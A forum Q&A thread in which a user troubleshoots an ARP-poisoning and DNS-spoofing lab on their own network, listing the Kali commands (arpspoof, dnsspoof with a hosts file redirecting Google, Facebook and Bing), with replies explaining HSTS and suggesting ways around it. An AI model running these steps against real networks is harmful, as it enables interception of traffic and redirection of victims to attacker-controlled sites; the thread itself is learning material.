DnsSpoof Target machine wont connect

Question

SETUP:

Target Machine: VM on my network, on a machine that is hardwired to the router

Kali Box: Tried both in a VM on the same machine as my target and a live boot on a laptop over wifi. Both within the same network

MACHINE IPS:

Target: 192.168.1.83

Gateway: 192.168.1.254

Address to redirect to: 162.226.5.161 (my blog)

Steps taken to spoof dns:

Setup traffic forwarding on my kali box

echo 1 > /proc/sys/net/ipv4/ip_forward

arp poison the gateway

arp -i wlan0 -t 192.168.1.254 192.168.1.83

arp poison the target

arp -i wlan0 -t 192.168.1.83 192.168.1.254

create a host file (using tab in between the ip and the url)

cat > host

162.226.5.161 *.google.com

162.226.5.161 *.facebook.com

162.226.5.161 *.bing.com

start dns spoof

dnsspoof -i wlan0 -f host

Results

When I use NSLOOKUP at retrieve the DNS records for my target sites the expected ip of 162.226.5.161 is returned. However when you go to the target sites in the browser it just times out.

When the target machine calls one of the target sites I can see dnsspoof logging the traffic.

THE PROBLEM:

As noted above, when you navigate to the target sites in the browser the request times out even though NSLOOKUP is returning the proper redirect ip.

Although your screenshots are hard to read, the two sites I see, www.google.com and www.facebook.com, are both on the **HSTS** preload list, and HTTPS (443) to your site 162.226.5.161 apparently times-out (it does so from my ISP at least). — dave_thompson_085, Sep 20 '16 at 10:58
Oh interesting. I didn't realize it was attempting to forward to port 443. Is there a way to switch it to port 80? @dave_thompson_085 — DotNetRussell, Sep 20 '16 at 11:01
To get a browser to send http to an HSTS host you'll have to patch the browser. Firefox and Chrome are open s9urce, but pretty big and complicated; if you're a very good programmer maybe a few weeks. (2) A nonbrowser client like curl or wget doesn't do HSTS and will send the request fine, but the results will be very hard to read. (3) You could set up an HTTP proxy so the browser thinks it is connecting to say `myfake.local` which has no HSTS and the proxy tries to relay to `www.google.com` which you spoof. Apache or nginx can do this, and maybe Squid or Burp etc.... — dave_thompson_085, Sep 21 '16 at 13:50
... (0) But easier just use a host not set for HSTS in the first place, as you already found. — dave_thompson_085, Sep 21 '16 at 13:51
@dave_thompson_085 that's the direction I needed. Thank you, I will look into HTTP proxy next — DotNetRussell, Sep 21 '16 at 13:51

score 0 · Accepted Answer · edited Jun 16 '20 at 09:49

So the answer was obvious I suppose but I still don't know how to work around this.

When the target machine was requesting a site such Facebook.com it was doing it over HTTPS obviously. Which I guess meant it expected the site returned to accept a HTTPS connection.

This means that if I wish to DNS Spoof and forward the target machine to a different site that (at least for the moment until I figure out a work around) it needs to accept the same protocol that was initially requested.

To test this theory I found a site that allows HTTP connections (MSN.com) and I instead returned my blog. This worked swimmingly.

Results

So the short answer to the above problem was that I was attempting to forward the target to a machine that didn't support HTTPS though that's what the target machines initial request was for.

By using a site that accepted HTTP requests I was able to confirm this was the problem.

DnsSpoof Target machine wont connect

1 Answers1

Results